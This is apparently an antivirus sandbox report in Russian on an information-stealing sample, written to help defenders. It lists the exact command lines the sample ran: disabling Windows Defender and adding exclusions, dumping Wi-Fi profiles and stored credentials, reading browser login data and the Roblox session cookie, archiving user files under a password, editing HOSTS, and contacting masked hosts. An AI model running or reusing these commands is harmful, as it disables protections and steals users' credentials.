Техническая информация
Вредоносные функции
Для затруднения выявления своего присутствия в системе
добавляет исключения антивируса:
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -Enabl...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath '<Полный путь к файлу>'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath '%ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
Запускает на исполнение
- '<SYSTEM32>\taskkill.exe' /F /PID 2900
- '<SYSTEM32>\taskkill.exe' /F /PID 972
- '<SYSTEM32>\taskkill.exe' /F /PID 1796
- '<SYSTEM32>\taskkill.exe' /F /PID 2352
- '<SYSTEM32>\taskkill.exe' /F /PID 4308
- '<SYSTEM32>\taskkill.exe' /F /PID 4532
- '<SYSTEM32>\taskkill.exe' /F /PID 4992
Завершает или пытается завершить
следующие пользовательские процессы:
- iexplore.exe
- firefox.exe
Читает файлы, отвечающие за хранение паролей сторонними программами
- %HOMEPATH%\desktop\adhd_and_obesity.docx
- %HOMEPATH%\desktop\issi2013_template_for_posters.docx
- %HOMEPATH%\desktop\13.jpg
- %HOMEPATH%\desktop\168.jpeg
- %HOMEPATH%\desktop\210252809.jpeg
- %HOMEPATH%\desktop\3.jpeg
- %HOMEPATH%\desktop\3.jpg
- %HOMEPATH%\desktop\hadac_newsletter_july_2010_final.docx
- %HOMEPATH%\desktop\lisp_success.doc
- %HOMEPATH%\desktop\pushkin.jpeg
- %LOCALAPPDATA%\microsoft\edge\user data\default\login data
- %LOCALAPPDATA%\microsoft\edge\user data\default\web data
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\_mei51162\vcruntime140.dll
- %TEMP%\_mei51162\_asyncio.pyd
- %TEMP%\_mei51162\_bz2.pyd
- %TEMP%\_mei51162\_ctypes.pyd
- %TEMP%\_mei51162\_decimal.pyd
- %TEMP%\_mei51162\_hashlib.pyd
- %TEMP%\_mei51162\_lzma.pyd
- %TEMP%\_mei51162\_multiprocessing.pyd
- %TEMP%\_mei51162\_overlapped.pyd
- %TEMP%\_mei51162\_queue.pyd
- %TEMP%\_mei51162\_socket.pyd
- %TEMP%\_mei51162\_sqlite3.pyd
- %TEMP%\_mei51162\_ssl.pyd
- %TEMP%\_mei51162\_uuid.pyd
- %TEMP%\_mei51162\_wmi.pyd
- %TEMP%\_mei51162\api-ms-win-core-console-l1-1-0.dll
- %TEMP%\_mei51162\api-ms-win-core-datetime-l1-1-0.dll
- %TEMP%\_mei51162\api-ms-win-core-debug-l1-1-0.dll
- %TEMP%\_mei51162\api-ms-win-core-errorhandling-l1-1-0.dll
- %TEMP%\_mei51162\api-ms-win-core-fibers-l1-1-0.dll
- %TEMP%\_mei51162\api-ms-win-core-file-l1-1-0.dll
- %TEMP%\_mei51162\api-ms-win-core-file-l1-2-0.dll
- %TEMP%\_mei51162\api-ms-win-core-file-l2-1-0.dll
- %TEMP%\_mei51162\api-ms-win-core-handle-l1-1-0.dll
- %TEMP%\_mei51162\api-ms-win-core-heap-l1-1-0.dll
- %TEMP%\_mei51162\api-ms-win-core-interlocked-l1-1-0.dll
- %TEMP%\_mei51162\api-ms-win-core-libraryloader-l1-1-0.dll
- %TEMP%\_mei51162\api-ms-win-core-localization-l1-2-0.dll
- %TEMP%\_mei51162\api-ms-win-core-memory-l1-1-0.dll
- %TEMP%\_mei51162\api-ms-win-core-namedpipe-l1-1-0.dll
- %TEMP%\_mei51162\api-ms-win-core-processenvironment-l1-1-0.dll
- %TEMP%\_mei51162\api-ms-win-core-processthreads-l1-1-0.dll
- %TEMP%\_mei51162\api-ms-win-core-processthreads-l1-1-1.dll
- %TEMP%\_mei51162\api-ms-win-core-profile-l1-1-0.dll
- %TEMP%\_mei51162\api-ms-win-core-rtlsupport-l1-1-0.dll
- %TEMP%\_mei51162\api-ms-win-core-string-l1-1-0.dll
- %TEMP%\_mei51162\api-ms-win-core-synch-l1-1-0.dll
- %TEMP%\_mei51162\api-ms-win-core-synch-l1-2-0.dll
- %TEMP%\_mei51162\api-ms-win-core-sysinfo-l1-1-0.dll
- %TEMP%\_mei51162\api-ms-win-core-timezone-l1-1-0.dll
- %TEMP%\_mei51162\api-ms-win-core-util-l1-1-0.dll
- %TEMP%\_mei51162\api-ms-win-crt-conio-l1-1-0.dll
- %TEMP%\_mei51162\api-ms-win-crt-convert-l1-1-0.dll
- %TEMP%\_mei51162\api-ms-win-crt-environment-l1-1-0.dll
- %TEMP%\_mei51162\api-ms-win-crt-filesystem-l1-1-0.dll
- %TEMP%\_mei51162\api-ms-win-crt-heap-l1-1-0.dll
- %TEMP%\_mei51162\api-ms-win-crt-locale-l1-1-0.dll
- %TEMP%\_mei51162\api-ms-win-crt-math-l1-1-0.dll
- %TEMP%\_mei51162\api-ms-win-crt-process-l1-1-0.dll
- %TEMP%\_mei51162\api-ms-win-crt-runtime-l1-1-0.dll
- %TEMP%\_mei51162\api-ms-win-crt-stdio-l1-1-0.dll
- %TEMP%\_mei51162\api-ms-win-crt-string-l1-1-0.dll
- %TEMP%\_mei51162\api-ms-win-crt-time-l1-1-0.dll
- %TEMP%\_mei51162\api-ms-win-crt-utility-l1-1-0.dll
- %TEMP%\_mei51162\base_library.zip
- %TEMP%\_mei51162\blank.aes
- %TEMP%\_mei51162\libcrypto-3.dll
- %TEMP%\_mei51162\libffi-8.dll
- %TEMP%\_mei51162\libssl-3.dll
- %TEMP%\_mei51162\pyexpat.pyd
- %TEMP%\_mei51162\python312.dll
- %TEMP%\_mei51162\rar.exe
- %TEMP%\_mei51162\select.pyd
- %TEMP%\_mei51162\setuptools\_vendor\importlib_metadata-8.7.1.dist-info\installer
- %TEMP%\_mei51162\setuptools\_vendor\importlib_metadata-8.7.1.dist-info\metadata
- %TEMP%\_mei51162\setuptools\_vendor\importlib_metadata-8.7.1.dist-info\record
- %TEMP%\_mei51162\setuptools\_vendor\importlib_metadata-8.7.1.dist-info\wheel
- %TEMP%\_mei51162\setuptools\_vendor\importlib_metadata-8.7.1.dist-info\licenses\license
- %TEMP%\_mei51162\setuptools\_vendor\importlib_metadata-8.7.1.dist-info\top_level.txt
- %TEMP%\_mei51162\setuptools\_vendor\jaraco\text\lorem ipsum.txt
- %TEMP%\_mei51162\sqlite3.dll
- %TEMP%\_mei51162\ucrtbase.dll
- %TEMP%\_mei51162\unicodedata.pyd
- %TEMP%\_mei51162\stub-o.pyc
- %ALLUSERSPROFILE%\microsoft\windows\start menu\programs\startup\ .scr
- %TEMP%\ \common files\desktop\13.jpg
- %TEMP%\ \common files\desktop\168.jpeg
- %TEMP%\ \common files\desktop\210252809.jpeg
- %TEMP%\ \common files\desktop\3.jpeg
- %TEMP%\ \common files\desktop\3.jpg
- %TEMP%\ \common files\desktop\adhd_and_obesity.docx
- %TEMP%\ \common files\desktop\hadac_newsletter_july_2010_final.docx
- %TEMP%\ \common files\desktop\issi2013_template_for_posters.docx
- %TEMP%\ \common files\desktop\lisp_success.doc
- %TEMP%\ \common files\desktop\pushkin.jpeg
- %TEMP%\ \system\antivirus.txt
- %TEMP%\ \directories\desktop.txt
- %TEMP%\ \directories\pictures.txt
- %TEMP%\ \directories\documents.txt
- %TEMP%\hbmzxbmu\hbmzxbmu.0.cs
- %TEMP%\hbmzxbmu\hbmzxbmu.cmdline
- %TEMP%\hbmzxbmu\hbmzxbmu.out
- %TEMP%\hbmzxbmu\csc7259f4b9151342e1a953818ba1737561.tmp
- %TEMP%\res927c.tmp
- %TEMP%\hbmzxbmu\hbmzxbmu.dll
- %TEMP%\ \display (1).png
- %TEMP%\ \system\system info.txt
- %TEMP%\ \system\task list.txt
- %TEMP%\rtnduvvccg.tmp
- %TEMP%\rla3gyyvdu.tmp
- %TEMP%\eukgar2ytf.tmp
- %TEMP%\ \system\mac addresses.txt
- %TEMP%\qvy15.zip
Присваивает атрибут 'скрытый' для следующих файлов
- <Полный путь к файлу>
Удаляет файлы, которые сам же создал
- %TEMP%\res927c.tmp
- %TEMP%\hbmzxbmu\csc7259f4b9151342e1a953818ba1737561.tmp
- %TEMP%\hbmzxbmu\hbmzxbmu.0.cs
- %TEMP%\hbmzxbmu\hbmzxbmu.cmdline
- %TEMP%\hbmzxbmu\hbmzxbmu.dll
- %TEMP%\hbmzxbmu\hbmzxbmu.out
- %TEMP%\rtnduvvccg.tmp
- %TEMP%\rla3gyyvdu.tmp
- %TEMP%\eukgar2ytf.tmp
Изменяет файл HOSTS.
Сетевая активность
Подключается к
- 'gs##tic.com':443
- 'ip##pi.com':80
- 'ap#.##legram.org':443
TCP
Запросы HTTP GET
- http://ip##pi.com/json/?fi###########
Другие
- 'gs##tic.com':443
UDP
- DNS ASK gs##tic.com
- DNS ASK ip##pi.com
- DNS ASK ap#.##legram.org
Другое
Ищет следующие окна
- ClassName: '' WindowName: ''
Создает и запускает на исполнение
- '%TEMP%\_mei51162\rar.exe' a -r -hp"xgr123" "%TEMP%\qvy15.zip" *
Перезапускает анализируемый образец
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c "powershell -Command Add-MpPreference -ExclusionPath '<Полный путь к файлу>'" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess ... (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "attrib +h +s "<Полный путь к файлу>"" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "powershell -Command Add-MpPreference -ExclusionPath '%ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "tasklist /FO LIST" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "wmic path win32_shortcutfile where name="C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Telegram Desktop\\Telegram.lnk" get target /value" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "wmic path win32_shortcutfile where name="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Steam\\Steam.lnk" get target /value" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "powershell Get-Clipboard" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "tree /A /F" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "netsh wlan show profile" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "systeminfo" (со скрытым окном)
- '<SYSTEM32>\attrib.exe' +h +s "<Полный путь к файлу>"
- '<SYSTEM32>\cmd.exe' /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "cmdkey /list" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbAB... (со скрытым окном)
- '<SYSTEM32>\tasklist.exe' /FO LIST
- '<SYSTEM32>\wbem\wmic.exe' path win32_shortcutfile where name="C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Telegram Desktop\\Telegram.lnk" get target /value
- '<SYSTEM32>\wbem\wmic.exe' path win32_shortcutfile where name="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Steam\\Steam.lnk" get target /value
- '<SYSTEM32>\tree.com' /A /F
- '<SYSTEM32>\systeminfo.exe'
- '<SYSTEM32>\cmdkey.exe' /list
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Get-Clipboard
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC...
- '<SYSTEM32>\reg.exe' QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
- '<SYSTEM32>\wbem\wmic.exe' /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
- '<SYSTEM32>\netsh.exe' wlan show profile
- '<SYSTEM32>\cmd.exe' /c "attrib -r <DRIVERS>\etc\hosts" (со скрытым окном)
- '<SYSTEM32>\attrib.exe' -r <DRIVERS>\etc\hosts
- '<SYSTEM32>\cmd.exe' /c "attrib +r <DRIVERS>\etc\hosts" (со скрытым окном)
- '<SYSTEM32>\attrib.exe' +r <DRIVERS>\etc\hosts
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\hbmzxbmu\hbmzxbmu.cmdline" (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES927C.tmp" "%TEMP%\hbmzxbmu\CSC7259F4B9151342E1A953818BA1737561.TMP" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "getmac" (со скрытым окном)
- '<SYSTEM32>\getmac.exe'
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /PID 2900" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /PID 972" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /PID 1796" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /PID 2352" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /PID 4308" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /PID 4532" (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
- '<SYSTEM32>\cmd.exe' /c "taskkill /F /PID 4992" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\_MEI51162\rar.exe a -r -hp"xgr123" "%TEMP%\qvy15.zip" *" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "wmic os get Caption" (со скрытым окном)
- '<SYSTEM32>\wbem\wmic.exe' os get Caption
- '<SYSTEM32>\cmd.exe' /c "wmic computersystem get totalphysicalmemory" (со скрытым окном)
- '<SYSTEM32>\wbem\wmic.exe' computersystem get totalphysicalmemory
- '<SYSTEM32>\cmd.exe' /c "wmic csproduct get uuid" (со скрытым окном)
- '<SYSTEM32>\wbem\wmic.exe' csproduct get uuid
- '<SYSTEM32>\cmd.exe' /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
- '<SYSTEM32>\cmd.exe' /c "wmic path win32_VideoController get name" (со скрытым окном)
- '<SYSTEM32>\wbem\wmic.exe' path win32_VideoController get name
- '<SYSTEM32>\cmd.exe' /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
